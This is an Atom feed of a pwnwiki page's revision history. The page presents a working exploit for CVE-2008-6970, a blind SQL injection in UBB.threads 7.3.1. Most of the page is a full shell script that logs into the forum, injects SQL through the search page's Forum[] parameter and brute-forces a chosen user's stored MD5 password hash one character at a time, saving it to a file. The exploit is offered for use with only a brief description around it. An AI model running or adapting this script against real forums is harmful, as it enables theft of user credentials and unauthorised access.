<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2008-6970_UBB.threads_7.3.1_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2008-6970 UBB.threads 7.3.1 SQL注入漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2008-6970_UBB.threads_7.3.1_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2008-6970_UBB.threads_7.3.1_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-14T11:02:44Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2008-6970_UBB.threads_7.3.1_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=888&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==INFO== &lt;pre&gt;  DESCRIPTION  Exploits PHP parameter input validation flaw and blindly brute force stored MD5 SQL hash for given user ID.   FILE  &lt;pre&gt; CVE-2008-6970.sh - Shell...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2008-6970_UBB.threads_7.3.1_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=888&amp;oldid=prev"/>
		<updated>2021-04-02T03:21:34Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==INFO== &amp;lt;pre&amp;gt;  DESCRIPTION  Exploits PHP parameter input validation flaw and blindly brute force stored MD5 SQL hash for given user ID.   FILE  &amp;lt;pre&amp;gt; CVE-2008-6970.sh - Shell...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==INFO==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
DESCRIPTION&lt;br /&gt;
&lt;br /&gt;
Exploits PHP parameter input validation flaw and blindly brute force stored MD5 SQL hash for given user ID. &lt;br /&gt;
&lt;br /&gt;
FILE&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
CVE-2008-6970.sh - Shell code program.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
SOURCE&lt;br /&gt;
&lt;br /&gt;
https://github.com/KyomaHooin/CVE-2008-6970&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==CVE-2008-6970.sh==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#!/bin/sh&lt;br /&gt;
#&lt;br /&gt;
# UBB 7.3.1 dosearch.php blind SQL injection brute force attack&lt;br /&gt;
#&lt;br /&gt;
&lt;br /&gt;
hex=(A B C D E F 0 1 2 3 4 5 6 7 8 9)&lt;br /&gt;
main='http://[removed]/ubbthreads/ubbthreads.php'&lt;br /&gt;
login='ubb=start_page&amp;amp;Loginname=[removed]&amp;amp;Loginpass=[removed]&amp;amp;firstlogin=1&amp;amp;from=http%3A%2F%2F[removed]%2Fubbthreads%2Fubbthreads.php%3Fubb%3Ddosearch%26amp%3Bfromsearch%3D1%26amp%3BWords%3Dmove%26amp%3BForum%5B%5D%3Df2%2527%29%29%2Band%2B1%253D1%2F*&amp;amp;buttlogin=Log+In'&lt;br /&gt;
base=&amp;quot;$main?ubb=dosearch&amp;amp;fromsearch=1&amp;amp;Words=body&amp;quot;&lt;br /&gt;
inject=&amp;quot;&amp;amp;Forum[]=f2')) AND (SELECT 1 FROM w3t_USERS WHERE USER_ID%3D3 AND UPPER(USER_PASSWORD) LIKE 'R%')%3D1/*&amp;quot;&lt;br /&gt;
&lt;br /&gt;
hash=()&lt;br /&gt;
&lt;br /&gt;
replace(){&lt;br /&gt;
	echo $1 | sed &amp;quot;s/LIKE '\(_*\)\(.*\)%'/LIKE '\1$2%'/&amp;quot;&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
push(){&lt;br /&gt;
	echo $1 | sed &amp;quot;s/LIKE '\(_*\)\(.*\)%'/LIKE '\1_$2%'/&amp;quot;&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
brute(){&lt;br /&gt;
	for char in ${hex[*]}; do&lt;br /&gt;
		#replace string&lt;br /&gt;
		inj=`replace &amp;quot;$inject&amp;quot; $char`&lt;br /&gt;
		#inject&lt;br /&gt;
		wget -O ubb --load-cookies cookies.txt --keep-session-cookies --save-cookies cookies.txt &amp;quot;$base$inj&amp;quot;&lt;br /&gt;
		#if match then return characters to hash array&lt;br /&gt;
		if [ -z `cat ubb | grep &amp;quot;There are no results&amp;quot;` ]; then&lt;br /&gt;
			hash+=($char)&lt;br /&gt;
			return&lt;br /&gt;
		fi&lt;br /&gt;
		rm ubb&lt;br /&gt;
	done&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
# INIT&lt;br /&gt;
&lt;br /&gt;
#get PHPSESSID cookie&lt;br /&gt;
wget -O /dev/null --keep-session-cookies --save-cookies cookies.txt $main&lt;br /&gt;
#login &amp;amp; get UBB cookies &amp;amp; inject SQL to bypass dosearch.inc.php access restriction&lt;br /&gt;
wget -O /dev/null --load-cookies cookies.txt --keep-session-cookies --save-cookies cookies.txt --post-data=$login $main&lt;br /&gt;
#blind SQL injection brute force attack&lt;br /&gt;
for ((i=0; i&amp;lt;32;i++)); do&lt;br /&gt;
	brute&lt;br /&gt;
	inject=`push &amp;quot;$inject&amp;quot; &amp;quot;R&amp;quot;`&lt;br /&gt;
done&lt;br /&gt;
#clean&lt;br /&gt;
rm cookies.txt&lt;br /&gt;
#print the hash&lt;br /&gt;
printf &amp;quot;%s&amp;quot; &amp;quot;${hash[@]}&amp;quot; &amp;gt;&amp;gt; hash.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>